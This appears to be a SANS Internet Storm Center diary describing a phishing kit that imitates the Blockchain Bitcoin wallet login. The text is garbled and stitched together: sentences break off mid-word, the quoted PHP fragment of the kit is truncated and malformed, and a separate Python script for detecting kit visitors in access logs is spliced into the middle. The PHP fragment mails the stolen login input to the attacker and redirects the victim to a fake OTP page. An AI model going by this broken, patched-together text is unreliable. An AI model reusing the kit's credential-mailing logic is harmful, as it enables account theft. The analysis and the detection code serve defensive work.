Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields:
| Internet actors | Google, Yahoo!, Facebook, ... |
| Software or manufacturers | Apple, Microsoft, Adobe, ... |
| Financial Services | PayPal, BoA, name your preferred bank, ... |
| Services | DHL, eBay, ... |
But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time a phishing page trying to lure the Bitcoin operator: BlockChain. Blockchain[1] is a key player in the management of
Hopefully, the webshell isn

    $from = From: b [email protected]\n
    $from .= MIME-Version: 1.0\r\n
    $from .= charset=ISO-8859-1\r\n
    if(@$_GET[accedi]==login){
    mail([email protected]
    header( Location: richiesta_otp.html
    }else{
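For the administrator of a site that ends up hosting such a kit, the two names visible in the fragment (the `accedi=login` GET parameter and the `richiesta_otp.html` redirect target) are enough to find affected visitors in the web server's access log. The Python code below is an added example, not part of the original diary; the combined log format, the `/kit/login.php` path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache/nginx "combined" access log lines.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
OTP_PAGE = "richiesta_otp.html"  # redirect target named in the kit fragment


def parse(line):
    """Return (ip, time, path, query dict, status), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, target, status = m.groups()
    url = urlsplit(target)
    return ip, ts, url.path, parse_qs(url.query), int(status)


def find_kit_hits(lines):
    """One finding per request carrying accedi=login; otp_page_served turns
    True when the same client is then served the OTP page."""
    findings, pending = [], {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # malformed request line, e.g. a scanner probe
        ip, ts, path, query, status = rec
        if "login" in query.get("accedi", []):
            hit = {"ip": ip, "time": ts, "script": path, "otp_page_served": False}
            findings.append(hit)
            pending[ip] = hit
        elif path.endswith("/" + OTP_PAGE) and ip in pending and status == 200:
            pending.pop(ip)["otp_page_served"] = True
    return findings


# Constructed sample (documentation IPs, hypothetical /kit/login.php path).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2017:09:14:02 +0000] "GET /kit/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2017:09:14:31 +0000] "POST /kit/login.php?accedi=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2017:09:14:32 +0000] "GET /kit/richiesta_otp.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [01/Jan/2017:09:20:00 +0000] "GET /kit/richiesta_otp.html HTTP/1.1" 200 2048 "-" "curl/7.50"',
    '198.51.100.23 - - [01/Jan/2017:10:02:11 +0000] "POST /kit/login.php?accedi=login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.99 - - [01/Jan/2017:10:05:00 +0000] "-" 400 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_kit_hits(SAMPLE):
        print(hit)
```

Each finding marks a visitor who submitted the login step; those with `otp_page_served` set went on to load the page the script redirects to.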
Note that the login procedure on BlockChain is extremely strong: 2FA authentication, and a one-time link is sent via email to approve all login attempts. Be sure to activate them if you're a BlockChain customer.
The fact that Bitcoin, the digital currency, is getting more and more popular makes it an interesting new target for attackers. This is also the case in corporate environments: there is a trend of companies building a reserve of Bitcoins to prevent possible ransomware attacks![3]
[1] https://www.blockchain.com
[2] http://klimatika.com.ua/block/
[3] https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
© SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Article Link: https://isc.sans.edu/diary.html?storyid=22482&rss